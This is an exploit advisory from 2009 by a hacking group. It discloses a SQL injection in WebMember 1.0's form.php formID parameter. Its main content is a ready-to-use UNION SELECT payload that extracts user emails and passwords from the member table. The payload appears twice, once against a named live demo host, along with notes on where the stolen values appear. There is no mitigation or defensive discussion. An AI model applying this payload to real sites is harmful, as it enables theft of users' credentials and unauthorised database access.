|
==================================================================================================================
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
S N N N A A K K E S T E A A M M M M
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
S N N N A A K K E S T E A A M M M
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
===================================================SNAKES TEAM====================================================
WebMember 1.0 (formID) Remote SQL Injection Vulnerability
==============================================:::ALGERIAN HaCkEr:::===============================================
= = = =
= = Discovered By: KiM :::ALGERIAN HaCkEr::: = =
= =
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
= =
= = :::::E-mail : x0@hotmail.es::::::: = =
= =
= Sript : http://www.phpmembers.com =
= http://www.phpmembers.com/download.html =
=================================== Snakespc ======================================
[x] Note :You must Sign up......
[x] Exploit:
http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user--
[x] Live demo:
http://demo.phpmembers.com/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user--
[x] Note2:
The injection's result will be in the link or inside the "Not Found" message
the default prefix of the table name is mem
===================================================================================================================
Greet'z : His0k4 ( My Love ^^ ) & Super_Cristal & CMOS_CLR17 & EVILWAY & Dr.OrYx & ALL ALGERIAN HACKERZ
str0ke.....>>>>.....milw0rm
===================================================================================================================
# [2009-05-26]
|